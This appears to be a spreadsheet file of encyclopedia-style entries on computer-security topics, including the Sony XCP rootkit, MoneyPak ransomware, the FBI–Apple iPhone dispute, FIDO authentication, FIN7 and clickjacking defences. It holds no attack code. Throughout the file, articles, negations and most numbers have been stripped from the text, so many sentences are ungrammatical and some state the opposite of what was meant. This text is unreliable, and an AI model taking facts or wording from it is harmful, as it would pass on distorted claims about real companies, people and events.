"component malicious compromise security," alleviate concerns users program posing potential security vulnerabilities, update released enable users remove rootkit component computers."an analysis uninstaller published mark russinovich initially uncovered titled "more sony: dangerous decloaking patch, eulas phoning home". obtaining original uninstaller requires specific browser (microsoft internet explorer) fill online form email address, receive email, install patch, fill second online form, receive link uninstaller. link personalized, work multiple uninstalls. furthermore, sony's privacy policy states address used promotions, given affiliates "reputable third parties contact directly". also reported uninstaller might security problems would allow remote code execution. sony's uninstall page would attempt install activex control displayed internet explorer. this activex control marked "safe scripting," means page utilize control methods. some methods provided control dangerous, allowed attacker upload execute arbitrary code. november 2005, sony announced would suspend manufacturing using system: precautionary measure, sony temporarily suspending manufacture containing technology," said statement. also intend re-examine aspects content protection initiative sure continues meet goals security ease consumer use," sony added. this followed comments stewart baker, department homeland security's assistant secretary policy, took manufacturers task, reported washington post: remark clearly aimed directly sony labels, stewart continued: "it's important remember intellectual property computer. pursuit protection intellectual property, important defeat undermine security measures people need adopt days." according york times, sony said "about million containing software shipped, million sold." albums distributed sony-bmg contained xcp.on november 2005, sony announced recalling affected plans offer exchanges consumers purchased discs. albums electronic frontier foundation published original list titles november 2005. november 2005 register published article saying many titles. sony says cds.amazon says treating defective merchandise offer refund shipping, long customer specifies request. various adverse side-effects rationally viewed defects, part (apparent) intended function xcp; view skirts substantive issue whether sony transgressed computer owners intentionally modifying computer systems without consent. also mediamax cd-3 janus (drm) openmg sony used sony connect securom notes references krebs, brian. "calif. lawsuit targets sony". washington post; november 2005. external links titles containing distributed united states sony help page online downloadable patch available sony virus writers exploit sony anti-piracy software</t>
  </si>
  <si>
    <t>F-PROT Antivirus for DOS</t>
  </si>
  <si>
    <t>frisk software international (established 1993) icelandic software company developed f-prot antivirus f-prot aves antivirus anti-spam service. company founded 1993. acquired cyren 2012. history company founded 1993. name derived initial letters personal name patronymic friðrik skúlason, founder. vesselin vladimirov bontchev, computer expert bulgaria, best known research dark avenger virus, worked company anti-virus researcher.f-prot antivirus first released 1989, making longest lived anti-virus brands market. world's first heuristic engine. sold home corporate packages, editions windows linux. there corporate versions microsoft exchange, solaris, certain eservers. linux version available home users free charge, virus definition updates. free 30-day trial versions platforms downloaded. f-prot aves specifically targeted towards corporate users.the company also produced genealogy program called espólín púki, spellchecker additional features.in summer 2012, frisk acquired cyren, israeli-american provider security products. f-prot antivirus f-prot antivirus (stylized f-prot) antivirus product developed frisk software international. available related versions several platforms. available microsoft windows, microsoft exchange server, linux, solaris, eservers. frisk software international allows others develop applications using scanning engine, sdk. many software vendors f-prot antivirus engine, including suse. f-prot antivirus reached end-of-life july 31st 2021 longer maintained. friðrik skúlason friðrik skúlason, also sometimes known "frisk", founder frisk software international founding members caro (computer antivirus research organization). originally developed f-prot antivirus computer support work. was, many years, technical editor virus bulletin. skúlason served head frisk software international eventual acquisition cyren 2012, joined cyren vice-president antivirus technologies. also comparison antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>FBI MoneyPak Ransomware</t>
  </si>
  <si>
    <t>moneypak ransomware, also known reveton ransomware, type ransomware malware. starts purporting national police agency (like american federal bureau investigation) locked computer smart phone "illegal activities" demands ransom payment greendot moneypak cards order release device. operation ransomware starts often downloaded accidentally visiting corrupt website running application modified javascript code. virus starts splash screen contains fbi's official logo warning computer locked. depending version, reason given either alleged copyright violations purported child pornography offences. also show supposed address sometimes still user's webcam. virus demands $100 $400 paid pre-paid moneypak cards order release computer. payment made, alleges open criminal investigation owner. virus creates iframe loop prevents user exiting browser website. virus installed infected device still requires removal device. reaction 2012, published advice relating moneypak virus, telling people ransom official confirmed real locked computers. they also stated users authorized security firms remove ransomware inform internet crime complaint center. 2018, announced working united kingdom's national crime agency (nca), arrested number people distributing malware united states arrested creator virus united kingdom.some people fooled thinking virus legitimate warning fbi. complained blocking phone child pornography attributed virus; however, admitted child pornography arrested police. references</t>
  </si>
  <si>
    <t>FBI–Apple encryption dispute</t>
  </si>
  <si>
    <t>fbi–apple encryption dispute concerns whether extent courts united states compel manufacturers assist unlocking cell phones whose data cryptographically protected. there much debate public access strong encryption.in 2015 2016, apple inc. received objected challenged least orders issued united states district courts writs 1789. most seek compel apple existing capabilities extract data like contacts, photos calls locked iphones running operating systems older" order assist criminal investigations prosecutions. requests, however, involve phones extensive security protections, apple current ability break. these orders would compel apple write software would government bypass devices' security unlock phones.the well-known instance latter category february 2016 court case united states district court central district california. federal bureau investigation (fbi) wanted apple create electronically sign software would enable unlock work-issued iphone recovered shooters who, december 2015 terrorist attack bernardino, california, killed people injured attackers later died shootout police, first destroyed personal phones. work phone recovered intact locked four-digit password eliminate data failed password attempts common anti-theft measure smartphones). apple declined create software, hearing scheduled march however, hearing supposed happen, government obtained delay, saying found third party able assist unlocking iphone. march government announced unlocked iphone withdrew request. march 2018, angeles times reported "the eventually found farook's phone information work revealed nothing plot."in another case brooklyn, magistrate judge ruled writs could used compel apple unlock iphone. government appealed ruling, dropped case april 2016, given correct passcode. background 1993, national security agency (nsa) introduced clipper chip, encryption device acknowledged backdoor government access, proposed used phone encryption. proposal touched public debate, known crypto wars, clipper chip never adopted.it revealed part 2013 mass surveillance disclosures edward snowden british government communications headquarters (gchq) access user data iphones, blackberry, android phones could read almost smartphone information, including sms, location, emails, notes. well, leak stated apple part government's surveillance program since 2012, however, apple spokesman time, "had never heard it".according york times, apple developed encryption methods operating system, versions later, deep apple could longer comply government warrants asking customer information extracted devices." throughout 2015, prosecutors advocated u.s. government able compel decryption iphone contents.in september 2015, apple released white paper detailing security measures then-new operating system. iphone model protected four-digit code. after incorrect attempts unlock phone wrong pin, contents phone rendered inaccessible erasing encryption protects stored data. according apple white paper, includes device firmware upgrade (dfu) mode, "[r]estoring device enters mode returns known good state certainty unmodified apple-signed code present." apple ordered assist recovered apple iphone 5c—owned bernardino county, california government—that issued employee, syed rizwan farook, shooters involved december 2015 bernardino attack. attack killed people seriously injured attackers died four hours attack shootout police, previously destroyed personal phones. authorities able recover farook's work phone, could unlock four-digit passcode, phone programmed automatically delete data failed password attempts. february 2016, announced unable unlock county-owned phone recovered, advanced security features, including encryption user data. first asked national security agency break phone, unable since knowledge breaking devices commonly used criminals, iphones. result, asked apple inc. create version phone's operating system could installed phone's random access memory disable certain security features apple refers "govtos". apple declined policy required never undermine security features products. responded successfully applying united states magistrate judge, sheri pym, issue court order, mandating apple create provide requested software. order subpoena, rather issued writs 1789. court order, called matter search apple iphone seized during execution search warrant black lexus is300, california license plate 35kgd203, filed united states district court central district california.the writs compel apple write software unprecedented and, according legal experts, likely prompt epic fight pitting privacy national security." also pointed implications legal precedent would established success action apple would beyond issues privacy. technical details order court order specified apple provide assistance accomplish following: bypass disable auto-erase function whether enabled" (this user-configurable feature automatically deletes keys needed read encrypted data consecutive incorrect attempts) enable submit passcodes subject device testing electronically physical device port, bluetooth, wi-fi, protocol available" ensure submits passcodes subject device, software running device purposefully introduce additional delay passcode attempts beyond incurred apple hardware"the order also specifies apple's assistance include providing software "will coded apple unique identifier phone [software] would load execute subject device"there much research analysis technical issues presented case since court order made available public. apple's opposition order february 2016 order issued magistrate judge gave apple five days apply relief apple believed order "unreasonably burdensome". apple announced intent oppose order, citing security risks creation backdoor would pose towards customers. also stated government ever asked similar access. company given february fully respond court order.on order issued, chief executive officer cook released online statement apple customers, explaining company's motives opposing court order. also stated respect fbi, request made threatens data security establishing precedent u.s. government could force technology company create software could undermine security products. said part: united states government demanded apple take unprecedented step threatens security customers. oppose order, implications beyond legal case hand. this moment calls public discussion, want customers people around country understand stake. response opposition, february u.s. department justice filed application urging federal judge compel apple comply order. application stated company could install software phone premises, hacked phone remote connection, apple could remove destroy software. apple hired attorneys olson theodore boutrous fight order appeal.the day, apple revealed early january discussed four methods access data iphone, but, revealed footnote february application court, promising methods ruled mistake investigation attack. after shooter's phone recovered, asked bernardino county, owner phone, reset password shooter's icloud account order acquire data icloud backup. however, rendered phone unable backup recent data icloud unless pass-code entered. this confirmed u.s. department justice, added backup would "insufficient" would able recover enough information legal arguments government cited precedent united states york telephone co., supreme court ruled 1977 writs gave courts power demand reasonable technical assistance phone company accessing phone calling records. apple responded york telephone already collecting data question course business, something supreme court took note ruling. apple also asserts compelled write software "amounts compelled speech viewpoint discrimination violation first amendment. what stop government demanding apple write code turn microphone government surveillance, activate video camera, surreptitiously record conversations, turn location services track phone's user?" apple argued made government's tools, employing resources nsa. hearing case scheduled march 2016.san bernardino county district attorney michael ramos filed brief stating iphone contain evidence "lying dormant cyber pathogen" could introduced bernardino county computer network, well identification possible third gunman alleged seen scene attack eyewitnesses. following day, ramos told associated press know whether shooters compromised county's infrastructure, know sure gaining access iphone. this statement criticized cyber-security professionals improbable. cook's statements interview time magazine cover story, cook said issue "privacy versus security privacy security privacy safety versus security." cook also said, "[t]his golden surveillance live there information much years ago, five years ago. it's everywhere. leaving digital footprints everywhere."in march 2016, apple press conference, cook talked ongoing conflict fbi, saying, "[w]e responsibility protect data privacy. shrink responsibility." withdrawal request march 2016, government requested granted delay, saying third party demonstrated possible unlock iphone question needed time determine work. march 2016, said unlocked iphone third party's help, anonymous official said hack's applications limited; department justice withdrew case. lawyer stated using extracted information investigate case.on april 2016, director james comey said tool used unlock iphone like used bernardino shooter, well older iphone models lacking touch sensor. comey also confirmed tool purchased third party would reveal source, later indicating tool cost $1.3 million purchase rights technical details tool functions. although able technological means access cellphone data bernardino shooter's iphone without apple, enforcement still expresses concern encryption controversy.some news outlets, citing anonymous sources, identified third party israeli company cellebrite. however, washington post reported that, according anonymous "people familiar matter", instead paid "professional hackers" used zero-day vulnerability iphone's software bypass ten-try limitation, need cellebrite's assistance. april 2021, washington post reported australian company azimuth security, white hacking firm, help fbi. other writs cases involving iphones apple previously challenged u.s. department justice's authority compel unlock iphone drug case united states district court eastern district york brooklyn order requiring apple inc. assist execution search warrant issued court, case number 1:15-mc-01902), magistrate judge case, james orenstein, requested apple's position issuing order. february 2016, judge orenstein denied government's request, saying writs cannot used force company modify products: "the implications government's position far-reaching terms would allow today implies congressional intent 1789 produce impermissibly absurd results." orenstein went criticize government's stance, writing, would absurd posit authority government sought anything obnoxious law." justice department appealed ruling district court judge margot brodie. apple requested delay attempted access bernardino iphone without apple's help. april succeeded, justice department told brooklyn court intended press forward demand assistance there, april government withdrew request, telling court individual" (the suspect, according press reports) provided correct passcode.in addition bernardino case brooklyn case, apple received least nine different requests federal courts writs iphone ipad products. apple objected requests. this fact revealed apple court filings brooklyn case made request judge case. most requests call upon apple existing capabilities extract data like contacts, photos calls locked iphones running operating systems ios7 older" brooklyn case), others "involve phones extensive encryption, apple cannot break" presumably seek order apple "design software government circumvent device's security protocols unlock phone" bernardino case). reactions national reactions apple's opposition order mixed. news poll sampled 1,022 americans found respondents supported fbi's stance, supported apple's stance. also, 1,002 surveyed americans smartphones divided sides; apple's decision, supported stance. support apple reform government surveillance coalition, includes major tech firms microsoft, facebook, yahoo!, twitter, linkedin, indicated opposition order. march deadline, large number amicus curiae briefs filed court, numerous technology firms supporting apple's position, including joint brief amazon.com, box, cisco systems, dropbox, evernote, facebook, google, lavabit, microsoft, mozilla, nest labs, pinterest, slack technologies, snapchat, whatsapp, yahoo!. briefs american civil liberties union, electronic frontier foundation, access now, center democracy technology also supported apple.the think tank niskanen center suggested case door-in-the-face technique designed gain eventual approval encryption backdoors viewed revival crypto wars.u.s. representative mike honda, democrat represented silicon valley region, voiced support apple.on february 2016, series pro-apple protests organized fight future held outside apple's stores locations.zeid raad al-hussein, united nations high commissioner human rights, warned potential "extremely damaging implications" human rights "risk unlocking pandora's box" investigation.general michael hayden, former director central intelligence agency, march interview maria bartiromo business network, supported apple's position, noting considers cyber-attacks number threat u.s. security saying "this case we've give things enforcement even counter terrorism order preserve aspect, cybersecurity."salihin kondoker, whose wife shot attack survived, filed friend court brief siding apple; brief said "understand[s] software government wants used millions innocent people. share fear."edward snowden said already technical means unlock apple's devices said, "the global technological consensus fbi."mcafee founder libertarian party presidential primary candidate john mcafee publicly volunteered decrypt iphone used bernardino shooters, avoiding need apple build backdoor. later indicated method would employ, extracting unique inside processor chip, difficult risks permanently locking phone, seeking publicity.ron wyden, democratic senator oregon noted privacy encryption advocate, questioned fbi's honesty concerning contents phone. said statement, "there real questions whether [the fbi] straight public [the apple case]." support some families victims survivors attack indicated would file brief support fbi.the national sheriffs' association suggested apple's stance "putting profit safety" "has nothing privacy." federal enforcement officers association, association prosecuting attorneys, national sheriffs' association filed brief supporting fbi."with apple's privacy policy customers getting phone without person's master password. with policy backdoor access phone enforcement access person's private information. this caused great dispute apple's encryption. apple closed backdoor enforcement believe creating backdoor would make easier enforcement, also make easier criminal hackers gain access people's personal data phone." former director james comey says drifting place country zones beyond reach law." believes backdoor access crucial investigations, without many criminals convicted.senator dianne feinstein california, democrat vice chairman senate intelligence committee, voiced opposition apple. candidates republican nomination 2016 u.s. presidential election dropped race february 2016 supported fbi's position, though several expressed concerns adding backdoors mobile phones.on february 2016, financial times reported bill gates, founder microsoft, sided case. however, gates later said interview bloomberg news "that state view this." added thought right balance safeguards need found courts congress, debate provoked case valuable.san bernardino police chief jarrod burguan said interview: i'll honest you, think reasonably good chance nothing value phone. what hoping might phone would potential contacts would obviously want talk this effort leave stone unturned investigation. [to] allow phone make effort information data inside phone simply fair victims families. manhattan district attorney cyrus vance jr., said wants apple unlock iphones office's cyber-crime unable access, adding, "apple directed able unlock phones court order independent judge proving demonstrating there's relevant evidence phone necessary individual case."fbi director comey, testifying house judiciary committee, compared apple's iphone security guard dog, saying, "we're asking apple take vicious guard away pick lock."apple's later encryption mechanisms make difficult government through. apple provided backdoor surveillance without company's discretion. however, comey stated want backdoor method surveillance want front door, clarity transparency, clear guidance provided law." believes special access required order stop criminals "terrorists child molesters". many companies apple would give u.s. access policies apple place users' confidentiality. calls compromise both 2016 democratic presidential candidates—former secretary state hillary clinton senator bernie sanders—suggested compromise found.u.s. defense secretary ashton carter called silicon valley federal government work together. squarely behind strong data security strong encryption, question it," said. carter also added "not believer back doors."in address 2016 south southwest conference march president barack obama stated could comment specific case, "you cannot take absolutist view [encryption]. view strong encryption matter what, create black boxes, strike balance we've lived years. fetishizing phones every value. that can't right answer." proposed legislation april 2016 u.s. senators richard burr dianne feinstein, republican chair senior democrat senate intelligence committee, respectively, released draft legislation would authorize state federal judges order "any person provides product method facilitate communication processing storage data" provide data intelligible form technical assistance unlocking encrypted data person distributes software devices must ensure capable complying order. freedom information lawsuit september 2016, associated press, vice media, gannett (the owner today) filed freedom information (foia) lawsuit fbi, seeking compel agency reveal hired unlock farook's iphone, much paid. september 2017, federal court ruled media organizations granted summary judgment government's favor. court ruled company hacked iphone amount paid national security secrets "intelligence sources methods" exempt disclosure foia; court additionally ruled amount paid "reflects confidential enforcement technique procedure" also falls foia exemption. inspector general investigation background august 2016 hess, fbi's executive assistant director, raised concerns office inspector general alleging disagreement units operational technology division (otd) capability access farook's iphone; namely cryptographic electronic analysis unit (ceau) remote operations unit (rou). also alleged officials indifferent leadership (herself included) giving possibly misleading testimony congress court orders capability. findings ultimately, inspector general's march 2018 report found evidence withheld knowledge ability unlock farook's iphone time director comey's congressional testimony february march 2016. however, report also found poor communication coordination ceau meant "not relevant personnel engaged outset". chief (named vice eric chuang) said became aware access problem february meeting digital forensics analysis section (dfas) member. while directors frequent contact investigation, including discussions farook's iphone, asst. dir. stephen richardson chief dfas, john bennett, believed time court order alternative. chuang claimed ceau chief help "line sand" using classified security tools domestic criminal cases. ceau chief denied line existed using classified techniques merely preference. nevertheless, perception line resulted getting involved john bennett's february meeting asking "anyone" bureau help. once chuang "got word out", soon learned trusted vendor "almost percent way" solution "many months" work asked prioritize completion. unnamed vendor came forward solution march 2016 successfully demonstrated leadership march attorneys office informed next withdrew court action apple march when asked involved earlier chief technical surveillance section (tss), eric chuang's superior, initially said "lane" handled exclusively dfas "that mandate". later claimed farook's phone discussed outset instruct unit chiefs contact outside vendors february either event, neither asked request help vendors mid-february. time attorneys office filed february court order, begun contacting vendors. ceau chief unable certainty consulted beforehand february 11th meeting final "mop-up" court action filed. ceau's search solutions within undocumented handled informally senior engineer ceau chief personally trusted checked "everybody". hand, possible hess' asking questions prompted february "mop-up" meeting. during ceau's search hess became concerned getting straight answers unit chiefs know capabilities others. inspector general stated further: ceau chief interested researching possible solutions instead focused unclassified techniques could readily disclosed court partner agencies already in-hand. both hess chuang stated ceau chief seemed want classified techniques appeared agenda pursuing favorable ruling apple. chuang described ceau chief "definitely happy" undermined legal case apple vented frustration him. hess said ceau chief wanted case "poster child" resolve larger problem encrypted devices known "going dark challenge". challenge defined "changes technology [that] hinder enforcement's ability exercise investigative tools follow critical leads". angeles times reported march 2018, unable access data 7,775 seized devices investigations. unidentified method used unlock farook's phone costing million obtain quit working apple updated operating system. conclusion inspector general's report found statements fbi's testimony congress accurate relied assumptions units coordinating effectively beginning. they also believe miscommunication delayed finding technical solution accessing farook's iphone. disputed since vendor working project independently "for time". however, according chuang described "relationship holder" vendor actively working complete solution moved "front burner" request; chief agreed. response inspector general's report, intended section consolidate resources address going dark problem improve coordination units. notes also bernstein united states‍—‌a case software speech disclosure list united states supreme court cases involving first amendment compelled speech riley california‍—‌holding unconstitutional warrantless search cellphone arrest, noting cellphones' unique privacy implications united states york telephone co.‍—‌holding enforcement officials obtain court order forcing telephone companies install registers order record numbers called particular telephone. universal city studios, inc. reimerdes‍—‌another case holding software form speech crypto wars references external links burr encryption bill discussion draft (leaked version) burr encryption bill discussion draft (official version) apple controversy director's comments 2016 dispute online source legal filings 2016 dispute cryptome statement united states attorney eileen decker government request vacate order directing apple help access iphone hardware hack defeats iphone passcode security</t>
  </si>
  <si>
    <t>FIDO Alliance</t>
  </si>
  <si>
    <t>fido ("fast identity online") alliance open industry association launched february 2013 whose stated mission develop promote authentication standards "help reduce world’s over-reliance passwords". fido addresses lack interoperability among devices strong authentication reduces problems users face creating remembering multiple usernames passwords. fido supports full range authentication technologies, including biometrics fingerprint iris scanners, voice facial recognition, well existing solutions communications standards, trusted platform modules (tpm), security tokens, embedded secure elements (ese), smart cards, near field communication (nfc). security token device used authenticate using simple password (e.g. four-digit pin) pressing button. specifications emphasize device-centric model. authentication wire happens using public-key cryptography. user's device registers user server registering public key. authenticate user, device signs challenge server using private holds. keys device unlocked local user gesture biometric pressing button. fido provides types user experiences depending protocol used. both protocols define common interface client whatever local authentication method user exercises. specifications following open specifications obtained fido site. universal authentication framework (uaf) proposed standard (december 2014) proposed standard (february 2017) review draft (november 2017)universal factor (u2f) proposed standard (october 2014) proposed standard (july 2017)fido (fido2, contributed november 2015)fido proposed standard (september 2015)client authenticator protocol (ctap) ctap proposed standard (september 2017) ctap implementation draft (february 2018) proposed standard (october 2014) starting point specification known fido proposed standard (september 2015). latter formally submitted world wide consortium (w3c) november 2015. subsequently, first working draft authentication (webauthn) standard published 2016. webauthn standard revised numerous times since then, becoming recommendation march 2019. meanwhile proposed standard (july 2017) became starting point client authenticator protocol proposed standard, published september 2017. fido ctap complements webauthn, scope fido2 project. milestones (2014-10-09) proposed standard released (2014-12-08) proposed standard released (2015-06-30) fido alliance released protocols support bluetooth technology near field communication (nfc) transport protocols (2015-09-04) fido proposed standard released fido attestation format fido signature format fido accessing fido credentials (2015-11-12) fido alliance submitted fido proposed standard world wide consortium (w3c) (2016-02-17) created authentication working group (2017-02-02) proposed standard released (2017-07-11) proposed standard released (2017-09-27) client authenticator protocol proposed standard released (2017-11-28) review draft released (2018-02-27) client authenticator protocol implementation draft released (2019–03) w3c’s authentication (webauthn) recommendation core component fido alliance’s fido2 specifications became official standard, signaling major step forward making secure usable users around world. also self-sovereign identity initiative open authentication (oath) webauthn authentication references external links official website</t>
  </si>
  <si>
    <t>FIDO2 Project</t>
  </si>
  <si>
    <t>fido2 project joint effort fido alliance world wide consortium (w3c) whose goal create strong authentication web. core, fido2 consists authentication (webauthn) standard fido client authenticator protocol (ctap2). fido2 based upon previous work done fido alliance, particular universal factor (u2f) authentication standard. taken together, webauthn ctap specify standard authentication protocol protocol endpoints consist user-controlled cryptographic authenticator (such smartphone hardware security key) webauthn relying party (also called fido2 server). user agent (i.e., browser) together webauthn client form intermediary authenticator relying party. single webauthn client device support multiple webauthn clients. example, laptop support multiple clients, conforming user agent running laptop. conforming user agent implements webauthn javascript api. name implies, client authenticator protocol (ctap) enables conforming cryptographic authenticator interoperate webauthn client. ctap specification refers protocol versions called ctap1/u2f ctap2. authenticator implements protocols typically referred authenticator fido2 authenticator, respectively. fido2 authenticator also implements ctap1/u2f protocol backward compatible u2f. invention using smartphone cryptographic authenticator computer network claimed patent 7,366,913 filed 2002. references</t>
  </si>
  <si>
    <t>FILE ID.DIZ</t>
  </si>
  <si>
    <t>file_id.diz plain-text file containing brief description content archive belongs. such files originally used archives distributed bulletin board systems (bbses) still used warez scene. file_id stands "file identification". stands "description zipfile".traditionally, file_id.diz lines text, line characters long", according v.1.9 specification. concept .diz files allow concise description uploaded files automatically applied. advertisements "high-ascii" artwork, common .nfo files, specifically prohibited. history bulletin boards commonly accept uploaded files users. software would prompt user supply description uploaded file, descriptions often less useful. system operators spent many hours going upload descriptions correcting editing descriptions. file_id.diz inclusion archives designed address problem. clark development association shareware professionals (asp) supported idea becoming standard file descriptions. clark rewrote pcbdescribe program included pcboard software. urged members description file format distributions. michael leavitt, employee clark development, released file specification pcbdescribe program source code public domain urged software companies support file. sysops could common third-party script written ppl, called "diz/2-pcb" would process, rewrite, verify, format files archives uploaded bbs. software would extract archive, examine contents, compile report, import description file format according liking. during time, usual practice additional lines description, exclaiming source uploaded bbs. even since decline dial-up bulletin board system, file_id.diz files still utilized warez scene releases unlicensed software. they commonly bundled part complete packaging self-described pirate groups, indicate number disks, basic information. along file, essential release. especially terms unlicensed software ("warez"), common file sequential compressed archive archive intentionally split multiple parts creation parts individually downloaded slower connections like dial-up. example: .rar, .r00, .r01, .r02, etc.), contain file. this probably contributed extended popularity decline bulletin board system late 1990s early 2000s now, since even casual consumers unlicensed software would stumbled upon abundance. formal structure while real-world among bbss varied, world even different brands coming expanded versions, official format plain, 7-bit ascii text, line characters wide. program/file name: ideally, uppercase followed space. carriage returns ignored file. version number: format "v1.123", followed space. number: only actual member, otherwise ignored. description separator: single short hyphen "-". description: description file. first lines short summary, older boards rest. anything beyond extended description, eight lines, official cut-off size. additional text could included beyond might included board.many archives would stick strictly 45-character plain ascii format first lines, contain appended 80-character wide 8-bit ascii ansi graphic page better-formatted documentation that. also .nfo another standard description files readme portable application description newer verbose alternative standard (warez) sauce architecture protocol created 1994 attaching metadata comments files. today facto standard within ansi community. desc.sdi similar filename fairly wide support, including pcboard. tended limited single line (smaller file_id.diz file). descript.ion text file containing line line file (and directory) descriptions (and optional meta data), originally introduced software 1989 references further reading ashby, bryan (2020-12-09). "retro standards part file descriptors". external links file_id.diz specification v1.9 richard holler. public service announcement: file_id.diz</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>fin7, also associated gold niagara, itg14, carbon spider, russian criminal advanced persistent threat group primarily targeted u.s. retail, restaurant, hospitality sectors since mid-2015. portion fin7 front company combi security. called successful criminal hacking groups world. history march 2017 fin7 engaged spearfishing campaign company employees involved filings.in august 2018 three members fin7 charged united states department justice cybercrimes impacted u.s. companies.in november 2018 reported fin7 behind data breaches robin, chili's, arby's, burgerville, omni hotels saks fifth avenue.in march 2020 reported fin7 engaged badusb attacks.in december 2020 reported fin7 close collaborator ryuk.in april 2021 "high-level manager" fin7 fedir hladyr ukraine sentenced years prison united states pleaded guilty charges conspiracy commit wire fraud count conspiracy commit computer hacking. references</t>
  </si>
  <si>
    <t>Clickjacking</t>
  </si>
  <si>
    <t>clickjacking (classified user interface redress attack redressing) malicious technique tricking user clicking something different user perceives, thus potentially revealing confidential information allowing others take control computer clicking seemingly innocuous objects, including pages.clickjacking instance confused deputy problem, wherein computer tricked misusing authority. history 2002, noted possible load transparent layer page user's input affect transparent layer without user noticing. however, mainly ignored major issue 2008. 2008, jeremiah grossman robert hansen discovered adobe flash player able clickjacked, allowing attacker gain access computer without user's knowledge. term "clickjacking" coined jeremiah grossman robert hansen, portmanteau words "click" "hijacking." attacks similar nature discovered, focus term redressing" changed describe category attacks, rather clickjacking itself. description form clickjacking takes advantage vulnerabilities present applications pages allow attacker manipulate user's computer advantage. example, clickjacked page tricks user performing undesired actions clicking concealed links. clickjacked page, attackers load another page original page transparent layer trick user taking actions, outcomes user expects. unsuspecting users think clicking visible buttons, actually performing actions invisible page, clicking buttons page layer. hidden page authentic page; therefore, attackers trick users performing actions users never intended. there tracing actions attackers later, users would genuinely authenticated hidden page. clickjacking categories classic: works mostly browser likejacking: utilizes facebook's social media capabilities nested: clickjacking tailored affect google+ cursorjacking: manipulates cursor's appearance location mousejacking: inject keyboard mouse input remote link browserless: browser cookiejacking: acquires cookies browsers filejacking: capable setting affected device file server password manager attack: clickjacking utilizes vulnerability autofill capability browsers classic classic clickjacking refers situation attacker uses hidden layers pages manipulate actions user's cursor does, resulting misleading user truly clicked on.a user might receive email link video news item, another webpage, product page amazon, "hidden" underneath "play" button news video. user tries "play" video actually "buys" product amazon. hacker send single click, rely fact visitor logged amazon.com 1-click ordering enabled. while technical implementation attacks challenging cross-browser incompatibilities, number tools beef metasploit project offer almost fully automated exploitation clients vulnerable websites. clickjacking facilitated facilitate attacks, xss. likejacking likejacking malicious technique tricking users viewing website "liking" facebook page social media posts/accounts intentionally mean "like". term "likejacking" came comment posted corey ballou article "like" anything (safely), first documented postings explaining possibility malicious activity regarding facebook's "like" button.according article ieee spectrum, solution likejacking developed facebook's hackathons. "like" bookmarklet available avoids possibility likejacking present facebook like button. nested nested clickjacking, compared classic clickjacking, works embedding malicious frame frames original, harmless page: framed page displayed window. this works vulnerability http header x-frame-options, which, element value sameorigin, browser checks aforementioned layers. fact additional frames added remaining undetected means attackers benefit. past, google+ faulty version x-frame-options, attackers able insert frames choice using vulnerability present google's image search engine. image display frames, present google+ well, attacker-controlled frames able load restricted, allowing attackers mislead whoever came upon image display page. cursorjacking cursorjacking redressing technique change cursor location user perceives, discovered 2010 eddy bordi, researcher vulnerability.fr, marcus niemietz demonstrated custom cursor icon, 2012 mario heiderich hiding cursor.jordi chancel, researcher alternativ-testing.fr, discovered cursorjacking vulnerability using flash, html javascript code mozilla firefox systems (fixed firefox 30.0) lead arbitrary code execution webcam spying.a second cursorjacking vulnerability discovered jordi chancel mozilla firefox systems (fixed firefox 37.0) using flash, html javascript code also lead spying webcam execution malicious addon, allowing execution malware affected user's computer. mousejack different clickjacking techniques redress mousejack wireless hardware-based vulnerability first reported marc newlin bastille.net 2016 allows external keyboard input injected vulnerable dongles. logitech supplied firmware patches manufacturers failed respond vulnerability. browserless browserless clickjacking, attackers utilize vulnerabilities programs replicate classic clickjacking them, without required presence browser. this method clickjacking mainly prevalent among mobile devices, usually android devices, especially toast notifications work. because toast notifications small delay moment notification requested moment notification actually displays on-screen, attackers capable using create dummy button lies hidden underneath notification still clicked cookiejacking cookiejacking form clickjacking cookies stolen victim's browsers. this done tricking user dragging object seemingly appears harmless, fact making user select entire content cookie targeted. from there, attacker acquire cookie data possesses. filejacking filejacking, attackers browser's capability navigate computer access computer files order acquire personal data. tricking user establishing active file server (through file folder selection window browsers use). with this, attackers access take files victims' computers. password manager attack 2014 paper researcher carnegie mellon university found browsers refuse autofill protocol current login page different protocol time password saved, password managers would insecurely fill passwords http version https-saved passwords. most managers protect iframe- redirection-based attacks exposed additional passwords password synchronization used multiple devices. prevention client-side noscript protection clickjacking (including likejacking) added mozilla firefox desktop mobile versions installing noscript add-on: clearclick feature, released october 2008, prevents users clicking invisible "redressed" page elements embedded documents applets. according google's "browser security handbook" 2008, noscript's clearclick "freely available product offers reasonable degree protection" clickjacking. protection newer cursorjacking attack added noscript 2.2.8 rc1. noclickjack "noclickjack" browser add-on (browser extension) adds client-side clickjack protection users google chrome, mozilla firefox, opera microsoft edge without interfering operation legitimate iframes. noclickjack based technology developed guardedid. noclickjack add-on free charge. guardedid guardedid commercial product) includes client-side clickjack protection users internet explorer without interfering operation legitimate iframes. guardedid clickjack protection forces frames become visible. guardedid teams add-on noclickjack protection google chrome, mozilla firefox, opera microsoft edge. gazelle gazelle microsoft research project secure browser based uses os-like security model, limited defenses clickjacking. gazelle, window different origin draw dynamic content another window's screen space content draws opaque. intersection observer intersection observer introduces concept tracking actual "visibility" target element human would define this allows framed widget detect covered. feature enabled default since google chrome released april 2019. chrome browser implement time. server-side framekiller site owners protect users redressing (frame based clickjacking) server side including framekiller javascript snippet pages want included inside frames different sources.such javascript-based protection always reliable. this especially true internet explorer, kind countermeasure circumvented design" including targeted page inside &lt;iframe security=restricted&gt; element. x-frame-options introduced 2009 internet explorer http header x-frame-options offered partial protection clickjacking adopted browsers (safari, firefox, chrome, opera) shortly afterwards. header, website owner, declares preferred framing policy: values deny, allow-from origin, sameorigin prevent framing, framing external sites, allow framing specified site, respectively. addition that, advertising sites return non-standard allowall value intention allow framing content page (equivalent setting x-frame-options all). 2013 x-frame-options header officially published 7034, internet standard. document provided informational purposes only. w3c's content security policy level recommendation provides alternative security directive, frame-ancestors, intended obsolete x-frame-options header.a security header like x-frame-options protect users clickjacking attacks using frame. content security policy frame-ancestors directive content security policy (introduced version 1.1) allow disallow embedding content potentially hostile pages using iframe, object, etc. this directive obsoletes x-frame-options directive. page served headers, frame-ancestors policy preferred browser.—although popular browsers disobey requirement.example frame-ancestors policies: disallow embedding. iframes etc. blank, contain browser specific error page. content-security-policy: frame-ancestors 'none' allow embedding content only. content-security-policy: frame-ancestors 'self' allow specific origins embed content content-security-policy: frame-ancestors www.example.com www.wikipedia.org also references</t>
  </si>
  <si>
    <t>FORCEDENTRY</t>
  </si>
